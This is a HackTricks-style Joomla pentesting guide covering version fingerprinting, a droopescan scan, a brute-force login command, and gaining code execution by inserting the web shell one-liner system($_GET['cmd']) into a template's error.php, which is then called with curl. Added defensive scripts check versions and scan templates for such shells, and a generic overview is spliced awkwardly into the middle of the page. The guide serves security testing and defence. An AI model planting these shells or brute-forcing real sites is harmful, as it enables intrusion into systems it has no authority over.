# Joomla
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? Or do you want access to the **latest version of PEASS or download HackTricks as PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
### Joomla Statistics
Joomla collects [usage statistics](https://developer.joomla.org/about/stats.html) such as the Joomla, PHP and database versions and the server operating systems in use on Joomla installations. This data can be queried through their public [API](https://developer.joomla.org/about/stats/api.html).
```bash
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool
{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}
```
## Enumeration
### Discovery/Recon
* Check the **meta**
```bash
curl https://www.joomla.org/ | grep Joomla | grep generator
```
* robots.txt
robots.txt is a text file that gives search-engine bots instructions about which parts of a site they are allowed or disallowed to access. This file can have a large effect on the ability of search-engine bots to crawl and index your site's pages.
By default, robots.txt is publicly accessible and can be found simply by appending "/robots.txt" to the site URL, for example www.example.com/robots.txt.
For security enthusiasts, robots.txt can reveal useful information about the site structure, disallowed files and protected areas. This can be useful to attackers looking for unauthorized access to the site.
Therefore, when pentesting a site built with Joomla, it is important to inspect the robots.txt file for useful information that may help in breaking the site's security.
```
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
```
# Joomla
## Introduction
Joomla is a popular open-source content management system (CMS) used for building websites and online applications. It is written in PHP and uses a MySQL database to store content. As with any web application, Joomla can have security vulnerabilities that can be exploited by attackers. In this section, we will explore some common vulnerabilities and techniques for pentesting Joomla websites.
## Enumeration
Before starting the pentesting process, it is important to gather information about the target Joomla website. This can be done through various enumeration techniques, such as:
1. **Banner Grabbing**: Retrieve the Joomla version by analyzing the server's response headers or error pages.
2. **Directory Enumeration**: Identify directories and files that may contain sensitive information or configuration files.
3. **Spidering**: Use tools like `wget` or `Burp Suite` to crawl the website and discover hidden pages or directories.
4. **Brute-Forcing**: Attempt to guess common usernames and passwords for the Joomla administration panel.
## Exploitation
Once the enumeration phase is complete, it is time to exploit any vulnerabilities found. Some common vulnerabilities in Joomla include:
1. **SQL Injection**: Exploit poorly sanitized user input to manipulate the database and extract sensitive information.
2. **File Inclusion**: Abuse insecure file inclusion functions to execute arbitrary code on the server.
3. **Cross-Site Scripting (XSS)**: Inject malicious scripts into web pages viewed by other users, potentially leading to session hijacking or defacement.
4. **Remote Code Execution (RCE)**: Execute arbitrary commands on the server by exploiting vulnerabilities in Joomla extensions or plugins.
## Post-Exploitation
After successfully exploiting a vulnerability, the attacker may gain unauthorized access to the Joomla website. At this stage, they can perform various actions, such as:
1. **Privilege Escalation**: Attempt to elevate their privileges to gain administrative access.
2. **Data Exfiltration**: Steal sensitive data from the Joomla database or file system.
3. **Defacement**: Modify the appearance of the website to display unauthorized content.
4. **Backdooring**: Install a persistent backdoor to maintain access to the compromised Joomla website.
## Conclusion
Pentesting Joomla websites requires a combination of enumeration, exploitation, and post-exploitation techniques. By understanding the common vulnerabilities and attack vectors, security professionals can better protect Joomla installations and prevent unauthorized access.
* README.txt
```
1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
```
### Version
* In **/administrator/manifests/files/joomla.xml** you can see the version.
* In **/language/en-GB/en-GB.xml** you can find the Joomla version.
* In **plugins/system/cache/cache.xml** you can see an approximate version.
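As an added example (not code from the HackTricks page), the script below does the two fingerprinting checks from this section in one place: it reads the `<version>` element from a manifest such as `/administrator/manifests/files/joomla.xml` and the `generator` meta tag from a front page, then compares the version against a baseline that your own patch policy sets. The XML and HTML samples are constructed; only the file paths come from the page. This is the check a defender runs across an inventory to find installs that have fallen behind.

```python
"""Added example (not code from the HackTricks page): extract the Joomla
version from the manifest files listed above and from the generator meta
tag, then compare it against a baseline version that your policy sets.
The XML and HTML samples are constructed; only the paths come from the page."""
import re
import xml.etree.ElementTree as ET
from typing import Optional, Tuple

# Constructed sample of /administrator/manifests/files/joomla.xml
JOOMLA_XML = """<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.9.4</version>
</extension>
"""

# Constructed sample of a front page head section (the "check the meta" step)
SAMPLE_HTML = ('<html><head><meta name="generator" '
               'content="Joomla! - Open Source Content Management" /></head></html>')

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="([^"]*)"', re.I)


def manifest_version(xml_text: str) -> Optional[str]:
    """Return the <version> element of a Joomla extension manifest, if present."""
    root = ET.fromstring(xml_text)
    node = root.find("version")
    if node is None or not node.text:
        return None
    return node.text.strip()


def generator_tag(html: str) -> Optional[str]:
    """Return the content of the generator meta tag, or None when absent."""
    match = GENERATOR_RE.search(html)
    return match.group(1) if match else None


def is_joomla(html: str) -> bool:
    """True when the generator meta tag identifies the site as Joomla."""
    return "joomla" in (generator_tag(html) or "").lower()


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '3.9.4' or '4.0.0-rc1' into a tuple of integers for comparison."""
    parts = []
    for piece in version.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group(0)) if digits else 0)
    return tuple(parts)


def is_outdated(version: str, baseline: str) -> bool:
    """True when the installed version is below the baseline you accept."""
    return parse_version(version) < parse_version(baseline)


if __name__ == "__main__":
    found = manifest_version(JOOMLA_XML)
    print("generator:", generator_tag(SAMPLE_HTML))
    # "3.10.0" is only an illustrative baseline, not a statement about releases
    print("manifest version:", found, "outdated:", is_outdated(found, "3.10.0"))
```

The manifest path is readable by the web server, so on a real deployment the same `<version>` value is also what an outside scanner sees; treat exposure of these XML files as expected and keep the version current rather than trying to hide it.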
```bash
droopescan scan joomla --url http://joomla-site.local/
```
In [**80,443 - Pentesting Web Methodology there is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
### Brute-Force
You can use this [script](https://github.com/ajnik/joomla-bruteforce) to try to brute-force the login.
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
admin:admin
```
## RCE
If you have managed to obtain **admin credentials** you can **get RCE inside** by adding a small piece of **PHP code** to gain **RCE**. We can do this by **customising** a **template**.
1. **Click** on **`Templates`** on the bottom left under `Configuration` to bring up the templates menu.
2. **Click** on a **template** name. Let's choose **`protostar`** under the `Template` column header. This takes us to the **`Templates: Customise`** page.
3. Finally, you can click on a page to bring up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows:
1. **`system($_GET['cmd']);`**
4. **Save & Close**
5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
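From the defender's side, the trace this technique leaves is a template PHP file that feeds request-controlled input into a command or code execution function. The script below, an added example that is not part of the HackTricks page, walks a `templates/` tree and reports any PHP line where a sink such as `system()` or `eval()` receives `$_GET`, `$_POST`, `$_REQUEST` or `$_COOKIE`. The sample tree (a clean `error.php` next to one carrying the one-liner from the steps above) is constructed in a temporary directory; the `protostar` name mirrors the page.

```python
"""Added example (not code from the HackTricks page): find template PHP files
in which a request superglobal reaches a command/code execution sink, which is
what the template-editor RCE described above leaves on disk.
The sample templates tree is constructed in a temp directory."""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# A sink name followed, within the same statement, by a request superglobal.
SINK_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
    r"[^;]*\$_(GET|POST|REQUEST|COOKIE)\b",
    re.I,
)


def suspicious_lines(php_source: str) -> List[Tuple[int, str]]:
    """Return (line number, stripped line) for each line matching SINK_RE."""
    hits = []
    for number, line in enumerate(php_source.splitlines(), 1):
        if SINK_RE.search(line):
            hits.append((number, line.strip()))
    return hits


def scan_templates(root: str) -> Dict[str, List[Tuple[int, str]]]:
    """Scan every .php/.phtml file under root; keys are slash-separated relative paths."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hits = suspicious_lines(handle.read())
            if hits:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = hits
    return findings


# Constructed minimal error.php in the style of a Joomla template
CLEAN_ERROR_PHP = """<?php
defined('_JEXEC') or die;
$app = JFactory::getApplication();
echo $this->error->getMessage();
"""
# The same file after the one-liner from the steps above has been saved into it
TAMPERED_ERROR_PHP = CLEAN_ERROR_PHP + "system($_GET['cmd']);\n"


def build_sample_tree() -> str:
    """Create templates/<name>/error.php for a clean and a tampered template."""
    root = tempfile.mkdtemp(prefix="joomla_templates_")
    for template, source in (("beez3", CLEAN_ERROR_PHP), ("protostar", TAMPERED_ERROR_PHP)):
        directory = os.path.join(root, template)
        os.makedirs(directory)
        with open(os.path.join(directory, "error.php"), "w", encoding="utf-8") as handle:
            handle.write(source)
    return root


def demo() -> Dict[str, List[Tuple[int, str]]]:
    """Build the constructed tree and scan it; used by the usage below."""
    return scan_templates(build_sample_tree())


if __name__ == "__main__":
    for rel_path, hits in demo().items():
        for number, line in hits:
            print(f"{rel_path}:{number}: {line}")
```

Run this against the real `templates/` directory of an install you administer, or better, diff the tree against a pristine copy of the same Joomla release, since a pattern scan catches only the obvious one-liner. The mitigation that removes the whole class is to make `templates/` not writable by the PHP process user; the template editor can then no longer save changes, so an admin-panel compromise does not turn directly into code execution.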